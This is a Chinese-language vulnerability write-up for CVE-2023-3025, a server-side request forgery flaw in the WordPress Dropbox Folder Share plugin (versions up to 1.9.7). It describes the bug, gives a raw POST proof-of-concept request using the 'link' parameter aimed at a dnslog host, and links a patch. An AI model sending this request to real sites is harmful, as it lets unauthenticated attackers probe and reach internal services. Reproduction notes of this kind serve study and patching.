WordPress Dropbox Folder Share服务器端请求伪造漏洞(CVE-2023-3025)

0x00写在前面

本次测试仅供学习使用，如若非法他用，与本平台和发布者无关，需自行负责！

0x01漏洞介绍

WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。

WordPress Plugin Dropbox Folder Share 1.9.7 及之前版本存在代码问题漏洞，该漏洞源于允许未经身份验证的攻击者通过link参数向 Web 应用程序的任意位置发出 Web 请求，可用于查询和修改来自内部服务的信息。

0x02影响版本

Dropbox Folder Share plugin for WordPress <= 1.9.7

0x03漏洞复现

1.访问漏洞环境

2.对漏洞进行复现

 POC （POST）

漏洞复现

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 63

action=getFolderHeaders&link=http://wohtqusxex.dgrh3.cn

测试dnslog

漏洞存在

3.nuclei工具测试（漏洞存在）

0x04修复建议

目前厂商已发布升级补丁以修复漏洞，补丁获取链接：

https://www.wordfence.com/threat-intel/vulnerabilities/id/d62bd2bd-db01-479f-89e4-8031d69a912f?source=cve